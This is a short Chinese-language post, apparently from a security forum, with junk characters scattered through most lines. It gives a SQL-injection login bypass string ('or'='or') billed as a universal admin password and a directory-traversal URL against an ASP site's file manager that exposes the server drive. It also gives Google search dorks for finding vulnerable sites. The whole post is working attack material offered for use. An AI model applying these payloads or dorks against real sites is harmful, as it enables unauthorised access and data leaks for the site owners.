后台万能密码 'or'='or'5 w4 D/ v5 B, j2 p
+ ?: j$ ?/ ~- E3 Z8 V后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!8 V+ U5 M/ q! T8 _0 e* R/ U
admin/uploadfile.asp?currentFolder=/upfiles/../
, ?. Q' d. {" d. f5 L% n5 B! ]
; e! e' [8 {0 ]; o6 n$ v9 U漏洞证明:
3 r9 J5 W2 y, Y! D+ c
4 D7 V# T/ K: N i' [/ K' {谷歌:inurl:type.asp?id=1 新闻中心
4 a5 L- D$ l! w或者 :inurl:download_ok.asp?! I5 y& T+ z6 ?# P/ `
1 I5 v$ f+ T( [* A
|